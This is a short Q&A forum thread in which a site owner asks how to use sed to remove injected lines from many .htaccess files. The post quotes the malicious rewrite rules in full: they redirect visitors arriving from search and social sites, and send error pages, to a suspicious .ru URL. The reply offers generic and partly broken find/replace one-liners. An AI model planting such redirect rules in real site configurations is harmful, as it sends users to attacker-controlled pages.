# removing malicious links from .htaccess using sed

Tags: sed

I have a couple of hundred .htaccess files and I want to remove mallicous lines from them. On the top they all have:

```
IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://pasla-ghwoo.ru/rqpgfap?8 [R=301,L]
</IfModule>
```

and on the bottom:

```
ErrorDocument 400 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 401 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 403 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 404 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 500 http://pasla-ghwoo.ru/rqpgfap?8
```

I'm really lost in sed portion, can somebody help me? :(

I have so far:

```
find . -name '.htaccess' -exec sed 'pasla-ghwoo' {} \;
```

Comment: Would it not be easier to restore them from your backups?

Comment: This doesn't help with the mechanism used to get the malicious files there in the first place.  Fix the root cause, not the symptom.

Answer (score 1):

What do you want to replace it with? I personally prefer this Perl one-liner:

```
perl -i.bak -p -e 's/find/replace/ig' .htaccess
```

This creates a backup files modified and adds the `.bak` extension.

Does that give you enough to get started?

Here is a similar sed e.g,, (untested though!):

```
sed -i 's/find/replace'
```

`-i` is "in place."